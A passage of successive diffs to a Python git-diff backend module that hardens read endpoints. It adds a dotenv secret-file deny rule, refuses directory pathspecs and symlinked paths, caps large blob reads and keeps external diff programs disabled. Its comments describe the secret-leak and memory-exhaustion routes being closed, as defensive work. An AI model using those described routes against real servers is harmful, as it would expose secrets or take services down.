-    if names != [path]:
+    head_kind = _object_type(root, f"HEAD:{path}")
+    index_kind = _object_type(root, f":0:{path}")
+    if TREE in (head_kind, index_kind):
         raise GitError("invalid_path", 400,
-                       f"{path} is a directory in the index",
-                       hint="diff one file at a time")
+                       f"{path} is a directory on one side of this diff",
+                       hint=ONE_FILE_HINT)
+
+    if index_kind is None:
+        # A blob in HEAD does not settle it. The INDEX cannot answer "tree"
+        # -- ``:0:<dir>`` is not an object -- so a directory there looks
+        # like nothing at all until its entries are asked for by name, and
+        # the pathspec would still match every one of them. This is the
+        # mirror of the case above: a file in HEAD, a folder staged over it.
+        result = run_git(["ls-files", "-z", "--", path], cwd=root,
+                         timeout=T_READ, read_only=True)
+        if [name for name in result.out.split("\x00") if name]:
+            raise GitError("invalid_path", 400,
+                           f"{path} is a directory in the index",
+                           hint=ONE_FILE_HINT)
+        if head_kind is None:
+            raise GitError("not_found", 404, f"git does not know {path}")
 
 
 def _require_one_blob(root: Path, path: str, commit: str,
                       parent: str | None) -> None:
-    """Refuse a commit diff of anything but a file, in either of its trees.
+    """Refuse a commit diff of anything but a file, in EITHER of its trees.
 
-    BOTH sides are asked, because a diff of a DELETED file is an ordinary
-    request: the path is gone from the commit and present in its parent.
-    Either side being a blob is enough; a tree on either side is the
-    directory case again, and nothing on either side is a 404.
+    Both sides are asked, and a ``tree`` on either one wins over a ``blob``
+    on the other. That order is the whole point: a commit that replaces a
+    directory with a file of the same name (or the reverse) has a blob on
+    one side and a tree on the other, and answering "blob, fine" there
+    prints the removal of every file that used to be under it -- which is
+    how ``diff("sub", "commit")`` came back holding ``sub/.env``.
+
+    A file DELETED by the commit still diffs: it is absent on one side and a
+    blob on the other, which no rule here refuses.
     """
     kinds = {kind for kind in
              (_object_type(root, f"{commit}:{path}"),
               _object_type(root, f"{parent}:{path}") if parent else None)
              if kind is not None}
-    if "blob" in kinds:
-        return
-    if "tree" in kinds:
+    if TREE in kinds:
         raise GitError("invalid_path", 400,
-                       f"{path} is a directory in {commit[:7]}",
-                       hint="diff one file at a time")
+                       f"{path} is a directory in {commit[:7]} or its parent",
+                       hint=ONE_FILE_HINT)
+    if BLOB in kinds:
+        return
     raise GitError("not_found", 404, f"no {path} in {commit[:7]}")
 
 
@@ -355,6 +393,11 @@ def _from_object(root: Path, spec: str) -> FileAtRef:
                      ok_codes=(0, 128), read_only=True)
     if result.returncode != 0:
         message = result.err.lower()
+        # Checked first: something IS there and it is not a file, which is
+        # the caller's mistake (a 400) rather than a missing object (404).
+        if _NOT_A_BLOB_PHRASE in message:
+            raise GitError("invalid_path", 400, f"{spec} is not a file",
+                           hint=ONE_FILE_HINT, stderr=result.err.strip())
         if any(phrase in message for phrase in _MISSING_BLOB_PHRASES):
             raise GitError("not_found", 404, f"no {spec} in this repository",
                            stderr=result.err.strip())
@@ -364,11 +407,16 @@ def _from_object(root: Path, spec: str) -> FileAtRef:
 
 def _from_worktree(root: Path, path: str) -> FileAtRef:
     """Read the file on disk, once git agrees it is part of the project."""
+    _refuse_a_link(root, path)
     # The one command that refuses ``--literal-pathspecs`` ("pathspec magic
-    # not supported by this command"). Safe here: it answers a question and
-    # returns no content, and the read below is a plain filesystem read of
-    # the literal path, so a pattern cannot make this hand back another
-    # file -- only refuse one that would have 404'd on the next line.
+    # not supported by this command"). Safe here on two counts. It answers a
+    # QUESTION and returns no content, and the read below is a plain
+    # filesystem read of the literal path -- so a pattern cannot make this
+    # hand back another file, only refuse one that would have 404'd on the
+    # next line. And pathspec MAGIC cannot reach it at all: every form of it
+    # (``:(glob)``, ``:!``, ``:/``) begins with a colon, and
+    # ``validate_rel_path`` refuses a colon anywhere in a path. That rule
+    # must not be relaxed while this exemption exists.
     ignored = run_git(["check-ignore", "-q", "--", path], cwd=root,
                       timeout=T_READ, ok_codes=(0, 1), read_only=True,
                       literal_pathspecs=False)
@@ -394,6 +442,43 @@ def _from_worktree(root: Path, path: str) -> FileAtRef:
         raise GitError("not_found", 404, f"{path} could not be read",
                        stderr=str(exc)) from None
     return _content(raw, size)
+
+
+def _refuse_a_link(root: Path, path: str) -> None:
+    """Refuse a worktree read through a symbolic link.
+
+    This is the one read that follows the FILESYSTEM rather than the object
+    database, and a link is the filesystem's own redirection: a tracked
+    ``notes.txt`` that points at ``.env`` is, to every check above,
+    an ordinary tracked file with an ordinary name -- ``check-ignore`` is
+    asked about ``notes.txt``, and ``.gitignore`` says nothing about that.
+    Opening it then serves the secret ``.gitignore`` was hiding.
+
+    ``validate_rel_path`` does not refuse links and must not: staging one is
+    a perfectly ordinary git operation, and the object database stores it as
+    what it is -- a blob holding the TARGET'S PATH, which is why reading a
+    link at ``HEAD`` or in the index leaks nothing and needs no check.
+
+    Two checks, because they catch different things. Every component is
+    tested with ``is_symlink`` (so a link anywhere in the chain counts, not
+    only the last one), and the resolved path is compared with the lexically
+    joined one -- which also catches a Windows junction, a redirection that
+    is not a symbolic link and that ``is_symlink`` answers False for. The
+    root's own links cancel out: both sides start from ``root.resolve()``.
+    """
+    current = root
+    for segment in path.split("/"):
+        current = current / segment
+        if current.is_symlink():
+            raise GitError("invalid_path", 400,
+                           f"{path} is or goes through a symbolic link",
+                           hint=LINK_HINT)
+    resolved_root = root.resolve()
+    if (os.path.normcase(str((root / path).resolve()))
+            != os.path.normcase(str(resolved_root.joinpath(*path.split("/"))))):
+        raise GitError("invalid_path", 400,
+                       f"{path} does not stay where it says it is",
+                       hint=LINK_HINT)
 
 
 def _content(raw: bytes, size: int) -> FileAtRef:

--- a/backend/app/core/git/diff.py
+++ b/backend/app/core/git/diff.py
@@ -36,7 +36,7 @@ from dataclasses import dataclass
 from pathlib import Path
 
 from .errors import GitError, classify_failure
-from .models import DiffResponse, FileAtRef
+from .models import DiffResponse, FileAtRef, GitStatus
 from .paths import is_env_secret_path, validate_rel_path, validate_sha
 from .repo import first_parent, read_status, resolve_commit
 from .runner import T_READ, run_git
@@ -88,9 +88,14 @@ def _readable_path(root: Path, path: str) -> str:
 
     The guard is not about the working copy: a ``.env`` that was committed
     once is in every later tree, and both of these functions can read one.
+
+    EVERY segment is checked, not only the last: ``.env/x`` and
+    ``config/.env/y`` name something inside a dotenv path, and a directory
+    called ``.env`` is exactly where somebody keeps one file of secrets per
+    environment.
     """
     clean = validate_rel_path(root, path)
-    if is_env_secret_path(clean):
+    if any(is_env_secret_path(segment) for segment in clean.split("/")):
         raise GitError("ignored", 403, f"{clean} is not served",
                        hint="dotenv files hold secrets and are never read "
                             "through this API")
@@ -158,20 +163,28 @@ class _Plan:
 
 
 def _plan(root: Path, path: str, scope: str, sha: str | None) -> _Plan:
-    """The command and the two sides for *scope*."""
-    if scope == "worktree":
+    """The command and the two sides for *scope*.
+
+    Every branch first makes git agree that *path* is ONE FILE. A pathspec
+    that matches a directory diffs everything under it, which is how a
+    request for ``sub`` comes back holding ``sub/.env``: the guard checked a
+    name, and git answered about a tree.
+    """
+    if scope in ("worktree", "index"):
+        status = read_status(root)
+        _require_one_file(root, path, status)
         # An UNTRACKED file has no index side, and ``git diff`` says nothing
         # at all about one -- an empty patch for a file the user can see is
         # the most confusing possible answer. ``--no-index`` against
         # ``/dev/null`` gives the patch that shows it as added, which it is.
-        if path in {entry.path for entry in read_status(root).untracked}:
-            return _Plan(["diff", "--no-index", "--no-color", "--no-ext-diff",
-                          "--", DEV_NULL, path],
-                         "index", "worktree", None, "worktree")
-        return _Plan(["diff", "--no-color", "--no-ext-diff", "-M", "--", path],
-                     "index", "worktree", "index", "worktree")
-
-    if scope == "index":
+        if scope == "worktree":
+            if path in {entry.path for entry in status.untracked}:
+                return _Plan(["diff", "--no-index", "--no-color",
+                              "--no-ext-diff", "--", DEV_NULL, path],
+                             "index", "worktree", None, "worktree")
+            return _Plan(["diff", "--no-color", "--no-ext-diff", "-M", "--",
+                          path],
+                         "index", "worktree", "index", "worktree")
         return _Plan(["diff", "--cached", "--no-color", "--no-ext-diff", "-M",
                       "--", path],
                      "HEAD", "index", "HEAD", "index")
@@ -186,11 +199,85 @@ def _plan(root: Path, path: str, scope: str, sha: str | None) -> _Plan:
     # root commit has no parent and is diffed against the empty tree.
     commit = resolve_commit(root, sha)
     parent = first_parent(root, commit)
+    _require_one_blob(root, path, commit, parent)
     trees = [parent, commit] if parent is not None else ["--root", commit]
     return _Plan(["diff-tree", "-M", "-p", "--no-color", "--no-ext-diff",
                   "--no-commit-id", *trees, "--", path],
                  f"{commit}^" if parent is not None else None,
                  commit, parent, commit)
+
+
+def _require_one_file(root: Path, path: str, status: GitStatus) -> None:
+    """Refuse anything that is not exactly one file of this repository.
+
+    A pathspec that names a DIRECTORY is a diff of everything under it, so
+    ``sub`` would answer with ``sub/.env`` -- the guard would have checked
+    the string ``sub`` and git would have opened somebody's secrets. The
+    same is true of a name that only LOOKS like a directory to the index (a
+    tree, a path that is gone from disk but still has entries under it).
+
+    Three answers, in the order that gives the most useful one first: a
+    directory on disk is a 400 that says to ask for one file; a path the
+    status already lists is a file by construction (``--untracked-files=all``
+    lists files, never the folders they are in); anything else is asked of
+    the index, where matching exactly itself means a tracked file, matching
+    something else means a tree, and matching nothing means there is nothing
+    to diff.
+    """
+    if (root / path).is_dir():
+        raise GitError("invalid_path", 400, f"{path} is a directory",
+                       hint="diff one file at a time")
+    known = {entry.path
+             for group in (status.staged, status.unstaged, status.untracked,
+                           status.conflicted)
+             for entry in group}
+    if path in known:
+        return
+
+    result = run_git(["ls-files", "-z", "--", path], cwd=root, timeout=T_READ,
+                     read_only=True)
+    names = [name for name in result.out.split("\x00") if name]
+    if not names:
+        raise GitError("not_found", 404, f"git does not know {path}")
+    if names != [path]:
+        raise GitError("invalid_path", 400,
+                       f"{path} is a directory in the index",
+                       hint="diff one file at a time")
+
+
+def _require_one_blob(root: Path, path: str, commit: str,
+                      parent: str | None) -> None:
+    """Refuse a commit diff of anything but a file, in either of its trees.
+
+    BOTH sides are asked, because a diff of a DELETED file is an ordinary
+    request: the path is gone from the commit and present in its parent.
+    Either side being a blob is enough; a tree on either side is the
+    directory case again, and nothing on either side is a 404.
+    """
+    kinds = {kind for kind in
+             (_object_type(root, f"{commit}:{path}"),
+              _object_type(root, f"{parent}:{path}") if parent else None)
+             if kind is not None}
+    if "blob" in kinds:
+        return
+    if "tree" in kinds:
+        raise GitError("invalid_path", 400,
+                       f"{path} is a directory in {commit[:7]}",
+                       hint="diff one file at a time")
+    raise GitError("not_found", 404, f"no {path} in {commit[:7]}")
+
+
+def _object_type(root: Path, spec: str) -> str | None:
+    """``blob`` / ``tree`` / ... for ``<rev>:<path>``, or None if it is gone.
+
+    ``<rev>:<path>`` is an object NAME rather than a pathspec, so no glob
+    magic reaches it and this answers about exactly the path asked for.
+    """
+    result = run_git(["cat-file", "-t", spec], cwd=root, timeout=T_READ,
+                     ok_codes=(0, 128), read_only=True)
+    if result.returncode != 0:
+        return None
+    return result.out.strip() or None
 
 
 def _is_binary_patch(patch: str) -> bool:
@@ -277,8 +364,14 @@ def _from_object(root: Path, spec: str) -> FileAtRef:
 
 def _from_worktree(root: Path, path: str) -> FileAtRef:
     """Read the file on disk, once git agrees it is part of the project."""
+    # The one command that refuses ``--literal-pathspecs`` ("pathspec magic
+    # not supported by this command"). Safe here: it answers a question and
+    # returns no content, and the read below is a plain filesystem read of
+    # the literal path, so a pattern cannot make this hand back another
+    # file -- only refuse one that would have 404'd on the next line.
     ignored = run_git(["check-ignore", "-q", "--", path], cwd=root,
-                      timeout=T_READ, ok_codes=(0, 1), read_only=True)
+                      timeout=T_READ, ok_codes=(0, 1), read_only=True,
+                      literal_pathspecs=False)
     if ignored.returncode == 0:
         raise GitError("ignored", 403, f"{path} is ignored by this repository",
                        hint="ignored files are not part of the project and "

--- a/backend/app/core/git/diff.py
+++ b/backend/app/core/git/diff.py
@@ -1,0 +1,321 @@
+"""What changed in one file, and what that file says at one ref.
+
+Both of these are open GETs -- the tab reads a diff the way it reads a
+status -- so both start at the same place: the ``.env`` guard. A dotenv file
+is refused at ANY ref, including the ones deep in history, because
+``.gitignore`` does not un-commit a secret that was committed once and a
+read endpoint that will hand it back is the whole exposure.
+
+After that the shape of both functions is the same three questions:
+
+* **which two things are being compared.** ``worktree`` is index against
+  disk, ``index`` is HEAD against index, ``commit`` is a commit against its
+  first parent -- and the ``old_ref`` / ``new_ref`` strings say so in the
+  tab's own words, so the header above a diff is not a guess.
+* **is there anything to show.** git answers "Binary files ... differ"
+  rather than a patch for a PNG, and an untracked file has no index side to
+  diff against at all -- that one becomes ``--no-index`` against
+  ``/dev/null``, which git for Windows understands as well as any POSIX
+  git.
+* **how much of it to hand over.** A patch is capped at
+  :data:`MAX_PATCH_BYTES` and a file at :data:`MAX_FILE_BYTES`, both cut in
+  BYTES and then decoded, so a multi-byte character split by the cut costs
+  one replacement character instead of an exception. ``truncated`` says it
+  happened; ``size`` is what git had before the cut.
+
+``--no-ext-diff`` is on every one of these commands, including the
+``--no-index`` one. Without it a repository whose config sets
+``diff.external`` -- or an inherited ``GIT_EXTERNAL_DIFF`` -- makes a diff
+request run that program on the server, which is a command line the user
+never typed and this process would then wait for.
+"""
+
+from __future__ import annotations
+
+from dataclasses import dataclass
+from pathlib import Path
+
+from .errors import GitError, classify_failure
+from .models import DiffResponse, FileAtRef
+from .paths import is_env_secret_path, validate_rel_path, validate_sha
+from .repo import first_parent, read_status, resolve_commit
+from .runner import T_READ, run_git
+
+#: The most patch text one response carries. A diff past a megabyte is not
+#: something anybody reads in a side panel; it is a generated file or a
+#: vendored tree, and the tab says so rather than sending it.
+MAX_PATCH_BYTES = 1024 * 1024
+
+#: The most of one file's content a response carries. Twice the patch cap,
+#: because a side-by-side view asks for BOTH sides in full.
+MAX_FILE_BYTES = 2 * 1024 * 1024
+
+#: How much of a file is read to decide whether it is text. A NUL in the
+#: first few kilobytes is what every diff tool means by "binary", and it is
+#: also what git itself uses.
+BINARY_SNIFF_BYTES = 8 * 1024
+
+#: The three things a diff can be about.
+DIFF_SCOPES = ("worktree", "index", "commit")
+
+#: The refs a file may be read at, besides a commit id.
+NAMED_REFS = ("HEAD", "index", "worktree")
+
+#: The empty side of an added file. A literal, even on Windows: git for
+#: Windows understands ``/dev/null`` in a pathspec and prints it back in the
+#: patch header, and ``NUL`` would be a file named NUL.
+DEV_NULL = "/dev/null"
+
+#: git's way of saying there is no patch to show.
+_BINARY_MARKER = "Binary files "
+
+#: What ``cat-file`` says when the blob is not there. Anything else that
+#: exits 128 is a repository problem, not a missing file, and is classified
+#: like any other failure.
+_MISSING_BLOB_PHRASES = (
+    # cat-file blob HEAD:<path that is not in HEAD>
+    "does not exist",
+    # cat-file blob <ref that is not an object>:<path>, and an unborn HEAD
+    "invalid object",
+    "not a valid object name",
+    # cat-file blob <valid sha>:<path added after that commit>
+    "exists on disk, but not in",
+)
+
+
+def _readable_path(root: Path, path: str) -> str:
+    """Validate *path*, and refuse a dotenv file whatever ref it was asked at.
+
+    The guard is not about the working copy: a ``.env`` that was committed
+    once is in every later tree, and both of these functions can read one.
+    """
+    clean = validate_rel_path(root, path)
+    if is_env_secret_path(clean):
+        raise GitError("ignored", 403, f"{clean} is not served",
+                       hint="dotenv files hold secrets and are never read "
+                            "through this API")
+    return clean
+
+
+def diff(root: Path, path: str, scope: str, *, sha: str | None = None,
+         blobs: bool = False) -> DiffResponse:
+    """The patch for one file, in one of the three scopes.
+
+    *scope* is ``worktree`` (index against the file on disk), ``index``
+    (HEAD against the index) or ``commit`` (that commit against its first
+    parent, which needs *sha*).
+
+    *blobs* additionally fills ``old_text`` / ``new_text`` with both whole
+    sides, for a side-by-side view. It costs two more git reads, so it is
+    off by default; a side that does not exist at that ref sets
+    ``old_missing`` / ``new_missing`` instead of failing the request, since
+    "this file was added here" is an answer and not an error.
+    """
+    clean = _readable_path(root, path)
+    if scope not in DIFF_SCOPES:
+        raise GitError("invalid_value", 400,
+                       f"scope must be one of {', '.join(DIFF_SCOPES)}")
+    plan = _plan(root, clean, scope, sha)
+
+    # ``diff`` exits 1 to mean "there are differences" under ``--no-index``,
+    # and 0 otherwise; neither is a failure.
+    result = run_git(plan.args, cwd=root, timeout=T_READ, ok_codes=(0, 1),
+                     read_only=True)
+    raw = result.stdout
+    patch = raw[:MAX_PATCH_BYTES].decode("utf-8", errors="replace")
+
+    response = DiffResponse(
+        patch=patch,
+        binary=_is_binary_patch(patch),
+        truncated=len(raw) > MAX_PATCH_BYTES,
+        old_ref=plan.old_ref,
+        new_ref=plan.new_ref,
+        # Known before anything is read: an untracked file has no index
+        # side, and a root commit has no parent.
+        old_missing=plan.old_source is None)
+    if blobs:
+        _fill_blobs(root, clean, response, plan)
+    return response
+
+
+@dataclass
+class _Plan:
+    """What one diff request compares, decided once.
+
+    ``old_ref`` / ``new_ref`` are what the TAB shows above the diff (git's
+    own notation, ``<sha>^``); ``old_source`` / ``new_source`` are what
+    :func:`file_at_ref` has to be asked to get each whole side, which is not
+    always the same string -- ``<sha>^`` is not a ref a closed grammar can
+    accept, so the parent is resolved to its own id. A ``None`` source means
+    that side does not exist.
+    """
+
+    args: list[str]
+    old_ref: str | None
+    new_ref: str
+    old_source: str | None
+    new_source: str
+
+
+def _plan(root: Path, path: str, scope: str, sha: str | None) -> _Plan:
+    """The command and the two sides for *scope*."""
+    if scope == "worktree":
+        # An UNTRACKED file has no index side, and ``git diff`` says nothing
+        # at all about one -- an empty patch for a file the user can see is
+        # the most confusing possible answer. ``--no-index`` against
+        # ``/dev/null`` gives the patch that shows it as added, which it is.
+        if path in {entry.path for entry in read_status(root).untracked}:
+            return _Plan(["diff", "--no-index", "--no-color", "--no-ext-diff",
+                          "--", DEV_NULL, path],
+                         "index", "worktree", None, "worktree")
+        return _Plan(["diff", "--no-color", "--no-ext-diff", "-M", "--", path],
+                     "index", "worktree", "index", "worktree")
+
+    if scope == "index":
+        return _Plan(["diff", "--cached", "--no-color", "--no-ext-diff", "-M",
+                      "--", path],
+                     "HEAD", "index", "HEAD", "index")
+
+    if not sha:
+        raise GitError("invalid_value", 400,
+                       "a commit diff needs the commit it is about")
+    # The first parent is resolved rather than asked for with
+    # ``--first-parent``: on a merge that option does not restrict
+    # ``diff-tree`` to one parent (git 2.53 prints one patch per parent), so
+    # the tab would show the same file twice with two different diffs. A
+    # root commit has no parent and is diffed against the empty tree.
+    commit = resolve_commit(root, sha)
+    parent = first_parent(root, commit)
+    trees = [parent, commit] if parent is not None else ["--root", commit]
+    return _Plan(["diff-tree", "-M", "-p", "--no-color", "--no-ext-diff",
+                  "--no-commit-id", *trees, "--", path],
+                 f"{commit}^" if parent is not None else None,
+                 commit, parent, commit)
+
+
+def _is_binary_patch(patch: str) -> bool:
+    """Did git say "Binary files ... differ" instead of giving a patch?
+
+    Anchored to the START of a line: the same sentence inside a hunk arrives
+    with a ``+``, ``-`` or space in front of it, and a text file that
+    happens to contain it must not be reported as binary.
+    """
+    return any(line.startswith(_BINARY_MARKER) and line.rstrip().endswith("differ")
+               for line in patch.splitlines())
+
+
+def _fill_blobs(root: Path, path: str, response: DiffResponse,
+                plan: _Plan) -> None:
+    """Read both whole sides into *response*, for a side-by-side view.
+
+    A side that does not exist at its ref -- an added file has no old side,
+    a deleted one no new side -- sets the ``missing`` flag and leaves the
+    text None. That is not an error: it is the ordinary shape of half the
+    diffs the tab shows.
+    """
+    if plan.old_source is not None:
+        response.old_text, response.old_missing = _side(root, path,
+                                                        plan.old_source)
+    response.new_text, response.new_missing = _side(root, path,
+                                                    plan.new_source)
+
+
+def _side(root: Path, path: str, ref: str) -> tuple[str | None, bool]:
+    """``(text, missing)`` for one side of a diff."""
+    try:
+        return file_at_ref(root, path, ref).text, False
+    except GitError as exc:
+        if exc.code == "not_found":
+            return None, True
+        raise
+
+
+def file_at_ref(root: Path, path: str, ref: str) -> FileAtRef:
+    """One file's content at one ref: ``HEAD``, ``index``, ``worktree``, a sha.
+
+    The ``.env`` guard runs first, before anything is read and whatever the
+    ref is.
+
+    A WORKTREE read is the one that needs a second question asked, because
+    the file on disk is not necessarily one git knows about: it must be
+    tracked or present in the status as untracked (otherwise there is
+    nothing to serve and it is a 404), and it must not be IGNORED -- an
+    ignored file is a 403, because ``.gitignore`` is where a project says
+    which files are not part of it, and a read endpoint that serves them
+    anyway makes that promise worthless.
+    """
+    clean = _readable_path(root, path)
+    if ref == "worktree":
+        return _from_worktree(root, clean)
+    if ref == "index":
+        return _from_object(root, f":0:{clean}")
+    if ref == "HEAD":
+        return _from_object(root, f"HEAD:{clean}")
+    return _from_object(root, f"{validate_sha(ref)}:{clean}")
+
+
+def _from_object(root: Path, spec: str) -> FileAtRef:
+    """Read a blob out of the object database (``<ref>:<path>``).
+
+    ``cat-file`` exits 128 for every kind of "there is nothing there": the
+    path is not in that tree, the ref is not an object, HEAD is unborn. All
+    of those are a 404 for a file view -- the phrases are in
+    :data:`_MISSING_BLOB_PHRASES`, read off git 2.53 -- and anything else
+    that exits 128 is classified like any other git failure, so a corrupt
+    object database is not reported as a missing file.
+    """
+    result = run_git(["cat-file", "blob", spec], cwd=root, timeout=T_READ,
+                     ok_codes=(0, 128), read_only=True)
+    if result.returncode != 0:
+        message = result.err.lower()
+        if any(phrase in message for phrase in _MISSING_BLOB_PHRASES):
+            raise GitError("not_found", 404, f"no {spec} in this repository",
+                           stderr=result.err.strip())
+        raise classify_failure(result.argv, result.returncode, result.err)
+    return _content(result.stdout, len(result.stdout))
+
+
+def _from_worktree(root: Path, path: str) -> FileAtRef:
+    """Read the file on disk, once git agrees it is part of the project."""
+    ignored = run_git(["check-ignore", "-q", "--", path], cwd=root,
+                      timeout=T_READ, ok_codes=(0, 1), read_only=True)
+    if ignored.returncode == 0:
+        raise GitError("ignored", 403, f"{path} is ignored by this repository",
+                       hint="ignored files are not part of the project and "
+                            "are not served")
+
+    tracked = run_git(["ls-files", "--error-unmatch", "--", path], cwd=root,
+                      timeout=T_READ, ok_codes=(0, 1), read_only=True)
+    if tracked.returncode != 0:
+        if path not in {entry.path for entry in read_status(root).untracked}:
+            raise GitError("not_found", 404, f"git does not know {path}")
+
+    target = root / path
+    try:
+        size = target.stat().st_size
+        with target.open("rb") as handle:
+            # One byte past the cap, so that "was there more" is answered
+            # without reading a file that does not fit in memory.
+            raw = handle.read(MAX_FILE_BYTES + 1)
+    except OSError as exc:
+        raise GitError("not_found", 404, f"{path} could not be read",
+                       stderr=str(exc)) from None
+    return _content(raw, size)
+
+
+def _content(raw: bytes, size: int) -> FileAtRef:
+    """Turn bytes into the response, with the cap and the binary sniff.
+
+    A binary file gets an EMPTY text and the flag, rather than a decoded
+    approximation of itself: the tab draws a placeholder for it, and
+    replacement characters would be a screenful of nothing that looks like
+    content.
+
+    *size* is what the file really is, before any cut -- so a truncated
+    response can still say how big the thing it truncated was.
+    """
+    if b"\x00" in raw[:BINARY_SNIFF_BYTES]:
+        return FileAtRef(text="", binary=True, size=size,
+                         truncated=size > MAX_FILE_BYTES)
+    return FileAtRef(text=raw[:MAX_FILE_BYTES].decode("utf-8", errors="replace"),
+                     binary=False, size=size, truncated=size > MAX_FILE_BYTES)

--- a/backend/app/core/git/diff.py
+++ b/backend/app/core/git/diff.py
@@ -18,10 +18,14 @@ After that the shape of both functions is the same three questions:
   ``/dev/null``, which git for Windows understands as well as any POSIX
   git.
 * **how much of it to hand over.** A patch is capped at
-  :data:`MAX_PATCH_BYTES` and a file at :data:`MAX_FILE_BYTES`, both cut in
+  :data:`MAX_PATCH_BYTES` and a file at :data:`MAX_FILE_BYTES`, cut in
   BYTES and then decoded, so a multi-byte character split by the cut costs
   one replacement character instead of an exception. ``truncated`` says it
-  happened; ``size`` is what git had before the cut.
+  happened; ``size`` is what git had before the cut. A file read out of the
+  OBJECT DATABASE is not cut but refused: its size is asked for first, and
+  past the cap the answer carries the size and no text at all, because
+  ``cat-file blob`` would have buffered the whole object in this process
+  before anything here could cut it (see :func:`_from_object`).
 
 ``--no-ext-diff`` is on every one of these commands, including the
 ``--no-index`` one. Without it a repository whose config sets
@@ -430,13 +434,28 @@ def file_at_ref(root: Path, path: str, ref: str) -> FileAtRef:
 def _from_object(root: Path, spec: str) -> FileAtRef:
     """Read a blob out of the object database (``<ref>:<path>``).
 
-    ``cat-file`` exits 128 for every kind of "there is nothing there": the
-    path is not in that tree, the ref is not an object, HEAD is unborn. All
-    of those are a 404 for a file view -- the phrases are in
+    The SIZE is asked for first, and a blob over :data:`MAX_FILE_BYTES` is
+    never read. ``cat-file blob`` writes the whole object down a pipe and
+    this process buffers all of it before a cap applied afterwards can cut
+    anything -- a repository holding a 231 MB file (measured) made an open
+    GET allocate 231 MB, which is a way to take the server down from a
+    route that needs no token. So the answer past the cap is the size and
+    ``truncated``, with no text: the promise this endpoint makes is a cap,
+    not a prefix, and the tab draws "too big to show" either way.
+
+    A ``cat-file -s`` that FAILS is not interpreted here -- it falls
+    through to the read below, whose failure is already mapped in one
+    place. ``cat-file`` exits 128 for every kind of "there is nothing
+    there": the path is not in that tree, the ref is not an object, HEAD is
+    unborn. All of those are a 404 for a file view -- the phrases are in
     :data:`_MISSING_BLOB_PHRASES`, read off git 2.53 -- and anything else
     that exits 128 is classified like any other git failure, so a corrupt
     object database is not reported as a missing file.
     """
+    size = _object_size(root, spec)
+    if size is not None and size > MAX_FILE_BYTES:
+        return FileAtRef(text="", binary=False, size=size, truncated=True)
+
     result = run_git(["cat-file", "blob", spec], cwd=root, timeout=T_READ,
                      ok_codes=(0, 128), read_only=True)
     if result.returncode != 0:
@@ -458,6 +477,30 @@ def _from_object(root: Path, spec: str) -> FileAtRef:
                            stderr=result.err.strip())
         raise classify_failure(result.argv, result.returncode, result.err)
     return _content(result.stdout, len(result.stdout))
+
+
+def _object_size(root: Path, spec: str) -> int | None:
+    """How many bytes the object at ``<rev>:<path>`` holds; None if unknown.
+
+    One cheap process -- git reads the object header and stops -- so that
+    the read after it can be skipped when the answer is "too big". None
+    covers every way this can fail to be a number: the object is not there,
+    the ref is not one, a future git answers something else. The caller
+    then reads as it always did, which is where those failures are already
+    turned into the right status code.
+
+    A TREE also has a size, and a tree over the cap would be reported like
+    an over-large file instead of the 400 ``cat-file blob`` earns it. That
+    needs one directory holding tens of thousands of entries, and the
+    answer still carries no content -- the one thing that must never come
+    back for a path that is not a file.
+    """
+    result = run_git(["cat-file", "-s", spec], cwd=root, timeout=T_READ,
+                     ok_codes=(0, 128), read_only=True)
+    if result.returncode != 0:
+        return None
+    text = result.out.strip()
+    return int(text) if text.isdigit() else None
 
 
 def _from_worktree(root: Path, path: str) -> FileAtRef:

--- a/backend/app/core/git/diff.py
+++ b/backend/app/core/git/diff.py
@@ -49,6 +49,7 @@ from .repo import (
     index_entries,
     path_redirects,
     read_status,
+    tree_entries,
 )
 from .runner import T_READ, run_git
 
@@ -348,7 +349,28 @@ def _require_one_blob(root: Path, path: str, commit: str,
         raise _submodule_error(path)
     if BLOB in kinds:
         return
+    if _is_gitlink(root, path, commit, parent):
+        raise _submodule_error(path)
     raise GitError("not_found", 404, f"no {path} in {commit[:7]}")
+
+
+def _is_gitlink(root: Path, path: str, commit: str,
+                parent: str | None) -> bool:
+    """Is *path* a SUBMODULE in either tree? Asked of the trees themselves.
+
+    ``cat-file -t`` answers "commit" for a gitlink only when this repository
+    happens to HAVE that commit -- which it does in a test fixture and does
+    not for a real submodule, whose objects live in the other repository.
+    There it exits 128 and the path reads as missing, so the one shape this
+    check exists for was answered "no such file in that commit" while the
+    other two scopes refused it by name. ``ls-tree`` reports the ENTRY, and
+    its mode says gitlink without the object being here.
+
+    Asked only on the way to a 404, so an ordinary diff pays nothing for it.
+    """
+    return any(mode == GITLINK_MODE
+               for rev in (commit, parent) if rev is not None
+               for mode, _ in tree_entries(root, rev, [path]))
 
 
 def _object_type(root: Path, spec: str) -> str | None:

--- a/backend/app/core/git/diff.py
+++ b/backend/app/core/git/diff.py
@@ -32,7 +32,6 @@ never typed and this process would then wait for.
 
 from __future__ import annotations
 
-import os
 from dataclasses import dataclass
 from pathlib import Path
 
@@ -43,6 +42,7 @@ from .repo import (
     GITLINK_MODE,
     first_parent,
     index_entries,
+    path_redirects,
     read_status,
     resolve_commit,
 )
@@ -516,21 +516,26 @@ def _refuse_a_link(root: Path, path: str) -> None:
 
     Two checks, because they catch different things. Every component is
     tested with ``is_symlink`` (so a link anywhere in the chain counts, not
-    only the last one), and the resolved path is compared with the lexically
-    joined one -- which also catches a Windows junction, a redirection that
-    is not a symbolic link and that ``is_symlink`` answers False for. The
-    root's own links cancel out: both sides start from ``root.resolve()``.
+    only the last one), and ``repo.path_redirects`` compares the resolved
+    path with the lexically joined one -- which also catches a Windows
+    junction, a redirection that is not a symbolic link and that
+    ``is_symlink`` answers False for.
+
+    The WHOLE path, last segment included, which is where this parts
+    company with ``repo.refuse_link_parents``: the write side may act on a
+    link because git tracks one as an ordinary blob, and this side may not
+    because it would open it. Same comparison underneath, two different
+    questions asked with it.
     """
+    segments = path.split("/")
     current = root
-    for segment in path.split("/"):
+    for segment in segments:
         current = current / segment
         if current.is_symlink():
             raise GitError("invalid_path", 400,
                            f"{path} is or goes through a symbolic link",
                            hint=LINK_HINT)
-    resolved_root = root.resolve()
-    if (os.path.normcase(str((root / path).resolve()))
-            != os.path.normcase(str(resolved_root.joinpath(*path.split("/"))))):
+    if path_redirects(root, segments):
         raise GitError("invalid_path", 400,
                        f"{path} does not stay where it says it is",
                        hint=LINK_HINT)

--- a/backend/app/core/git/errors.py
+++ b/backend/app/core/git/errors.py
@@ -58,6 +58,7 @@ never drags the subprocess machinery in with it.
 
 from __future__ import annotations
 
+import re
 from collections.abc import Sequence
 from dataclasses import dataclass
 
